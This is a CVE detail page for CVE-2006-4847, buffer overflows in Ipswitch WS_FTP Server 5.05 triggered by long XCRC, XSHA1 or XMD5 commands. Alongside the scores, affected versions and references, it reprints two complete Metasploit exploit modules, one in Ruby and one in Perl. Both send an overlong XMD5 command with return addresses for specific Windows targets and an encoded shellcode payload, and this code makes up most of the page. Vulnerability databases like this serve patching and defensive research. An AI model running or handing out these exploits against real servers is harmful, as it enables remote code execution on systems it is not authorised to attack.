CVE-2006-4847 : Detail

CVE-2006-4847

90.2%V4
Network
2006-09-18
23h00 +00:00
2017-07-19
13h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple buffer overflows in Ipswitch WS_FTP Server 5.05 before Hotfix 1 allow remote authenticated users to execute arbitrary code via long (1) XCRC, (2) XSHA1, or (3) XMD5 commands.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 16717

Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: wsftp_server_505_xmd5.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Ipswitch WS_FTP Server 5.05 XMD5 Overflow', 'Description' => %q{ This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP Server 5.05. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2006-4847' ], [ 'OSVDB', '28939' ], [ 'BID', '20076' ], ], 'Privileged' => false, 'Payload' => { 'Space' => 300, 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663 } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 } ], [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], ], 'DisclosureDate' => 'Sep 14 2006', 'DefaultTarget' => 0)) end def check connect disconnect if (banner =~ /WS_FTP Server 5.0.5/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect_login print_status("Trying target #{target.name}...") sploit = rand_text_alphanumeric(676, payload_badchars) sploit << [target.ret].pack('V') + payload.encoded send_cmd( ['XMD5', sploit] , false) handler disconnect end end
Exploit Database EDB-ID : 3335

Publication date : 2007-02-18 23h00 +00:00
Author : Jacopo Cervini
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::wsftp_server_505_xmd5; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'WS-FTP Server 5.05 XMD5 Overflow', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ], 'Priv' => 0, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 21], 'SSL' => [0, 'BOOL', 'Use SSL'], 'USER' => [1, 'DATA', 'Username', 'ftp'], 'PASS' => [1, 'DATA', 'Password', 'ftp'], }, 'Payload' => { 'Space' => 329, 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'Keys' => ['+ws2ord'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits the buffer overflow found in the XMD command in IPSWITCH WS_FTP Server 5.05. }), 'Refs' => [ ['BID', '20076'], [ 'CVE', '2006-4847' ], ], 'DefaultTarget' => 0, 'Targets' => [ ['WS-FTP Server 5.05 Universal', 0x1002e636 ], # push esp, ret in LIBEAY32.dll ], 'Keys' => ['wsftp'], 'DisclosureDate' => 'Sep 14 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; if (! $self->InitNops(128)) { $self->PrintLine("[*] Failed to initialize the NOP module."); return; } my $request = Pex::Text::PatternCreate(676); $request .= pack("V", $target->[1]); $request .= $shellcode; my $s = Msf::Socket::Tcp->new ( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError) { $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } my $r = $s->RecvLineMulti(20); if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; } $self->Print($r); $s->Send("USER ".$self->GetVar('USER')."\n"); $r = $s->RecvLineMulti(10); if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; } $self->Print($r); $s->Send("PASS ".$self->GetVar('PASS')."\n"); $r = $s->RecvLineMulti(10); if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; } $self->Print($r); $self->PrintLine("[*] Attemping to exploit target '".$target->[0]."'..."); $s->Send("XMD5 $request\n"); $r = $s->RecvLineMulti(10); if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; } $self->Print($r); sleep(2); return; } # milw0rm.com [2007-02-19]

Products Mentioned

Configuraton 0

Ipswitch>>Ws_ftp_server >> Version 1.0.1eval

    Ipswitch>>Ws_ftp_server >> Version 1.0.2eval

      Ipswitch>>Ws_ftp_server >> Version 3.0_1

        Ipswitch>>Ws_ftp_server >> Version 4.01

          Ipswitch>>Ws_ftp_server >> Version 5.02

            Ipswitch>>Ws_ftp_server >> Version 5.03

              Progress>>Ws_ftp_server >> Version To (including) 5.05

              Progress>>Ws_ftp_server >> Version 1.0.1

              Progress>>Ws_ftp_server >> Version 1.0.1.e

              Progress>>Ws_ftp_server >> Version 1.0.2

              Progress>>Ws_ftp_server >> Version 1.0.2.e

              Progress>>Ws_ftp_server >> Version 1.0.3

              Progress>>Ws_ftp_server >> Version 1.0.4

              Progress>>Ws_ftp_server >> Version 1.0.5

              Progress>>Ws_ftp_server >> Version 2.0

              Progress>>Ws_ftp_server >> Version 2.0.1

              Progress>>Ws_ftp_server >> Version 2.0.2

              Progress>>Ws_ftp_server >> Version 2.0.3

              Progress>>Ws_ftp_server >> Version 2.0.4

              Progress>>Ws_ftp_server >> Version 3.0

              Progress>>Ws_ftp_server >> Version 3.1

              Progress>>Ws_ftp_server >> Version 3.1.1

              Progress>>Ws_ftp_server >> Version 3.1.2

              Progress>>Ws_ftp_server >> Version 3.1.3

              Progress>>Ws_ftp_server >> Version 3.4

              Progress>>Ws_ftp_server >> Version 4.0

              Progress>>Ws_ftp_server >> Version 4.0.2

              References

              http://secunia.com/advisories/21932
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.vupen.com/english/advisories/2006/3655
              Tags : vdb-entry, x_refsource_VUPEN
              http://www.osvdb.org/28939
              Tags : vdb-entry, x_refsource_OSVDB
              http://www.securityfocus.com/bid/20076
              Tags : vdb-entry, x_refsource_BID